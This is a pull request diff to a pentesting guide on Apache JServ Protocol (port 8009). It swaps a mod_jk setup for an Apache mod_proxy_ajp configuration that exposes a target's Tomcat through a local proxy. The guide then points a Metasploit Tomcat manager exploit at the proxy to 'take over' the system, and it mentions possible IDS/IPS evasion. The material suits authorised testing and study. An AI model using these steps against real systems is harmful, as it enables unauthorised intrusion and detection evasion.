### PR TITLE
Update 8009-pentesting-apache-jserv-protocol-ajp.md

### DIFF
--- a/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
+++ b/pentesting/8009-pentesting-apache-jserv-protocol-ajp.md
@@ -22,51 +22,24 @@ PORT     STATE SERVICE
 It’s not often that you encounter port 8009 open and port 8080,8180,8443 or 80 closed but it happens. In which case it would be nice to use existing tools like metasploit to still pwn it right? As stated in one of the quotes you can \(ab\)use Apache to proxy the requests to Tomcat port 8009. In the references you will find a nice guide on how to do that \(read it first\), what follows is just an overview of the commands I used on my own machine. I omitted some of the original instruction since they didn’t seem to be necessary.
 
 ```text
-(apache must already be installed)
-sudo apt-get install libapach2-mod-jk
-sudo vim /etc/apache2/mods-available/jk.conf
-	# Where to find workers.properties
-	# Update this path to match your conf directory location
-	JkWorkersFile /etc/apache2/jk_workers.properties
-	# Where to put jk logs
-	# Update this path to match your logs directory location
-	JkLogFile /var/log/apache2/mod_jk.log
-	# Set the jk log level [debug/error/info]
-	JkLogLevel info
-	# Select the log format
-	JkLogStampFormat "[%a %b %d %H:%M:%S %Y]"
-	# JkOptions indicate to send SSL KEY SIZE,
-	JkOptions +ForwardKeySize +ForwardURICompat -ForwardDirectories
-	# JkRequestLogFormat set the request format
-	JkRequestLogFormat "%w %V %T"
-	# Shm log file
-	JkShmFile /var/log/apache2/jk-runtime-status
-sudo ln -s /etc/apache2/mods-available/jk.conf /etc/apache2/mods-enabled/jk.conf
-sudo vim /etc/apache2/jk_workers.properties
-	# Define 1 real worker named ajp13
-	worker.list=ajp13
-	# Set properties for worker named ajp13 to use ajp13 protocol,
-	# and run on port 8009
-	worker.ajp13.type=ajp13
-	worker.ajp13.host=localhost
-	worker.ajp13.port=8009
-	worker.ajp13.lbfactor=50
-	worker.ajp13.cachesize=10
-	worker.ajp13.cache_timeout=600
-	worker.ajp13.socket_keepalive=1
-	worker.ajp13.socket_timeout=300
-sudo vim /etc/apache2/sites-enabled/000-default 
-    JkMount /* ajp13
-    JkMount /manager/   ajp13
-    JkMount /manager/*  ajp13
-    JkMount /host-manager/   ajp13
-    JkMount /host-manager/*  ajp13    
-sudo a2enmod proxy_ajp
+sudo apt-get install libapache2-mod-jk
+sudo vim /etc/apache2/apache2.conf # append the following line to the config
+    Include ajp.conf
+sudo vim /etc/apache2/ajp.conf 	# create the following file, change HOST to the target address 
+    ProxyRequests Off
+    <Proxy *>
+        Order deny,allow
+        Deny from all
+        Allow from localhost
+    </Proxy>
+    ProxyPass       / ajp://HOST:8009/
+    ProxyPassReverse    / ajp://HOST:8009/
 sudo a2enmod proxy_http
-sudo /etc/init.d/apache2 restart
+sudo a2enmod proxy_ajp
+sudo systemctl restart apache2
 ```
 
-Don’t forget to adjust _worker.ajp13.host_ to the correct host. A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this.  Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also:
+A nice side effect of using this setup is that you might thwart IDS/IPS systems in place since the AJP protocol is somewhat binary, but I haven’t verified this.  Now you can just point your regular metasploit tomcat exploit to 127.0.0.1:80 and take over that system. Here is the metasploit output also:
 
 ```text
 msf  exploit(tomcat_mgr_deploy) > show options


### PR DESCRIPTION
I'd like to propose a more elegant solution of setting up a local ajp proxy i've stumbled on as an alternative or a replacement to the existing method. 

Tested on:
 - Kali linux 2020.4
 - Apache/2.4.46 (Debian)
 - ajp13
 - Apache Tomcat 9.0.19

I've managed to set up the proxy using the new method, but did not succeed in doing this by following the existing instructions. Hope this will make a good use to others :)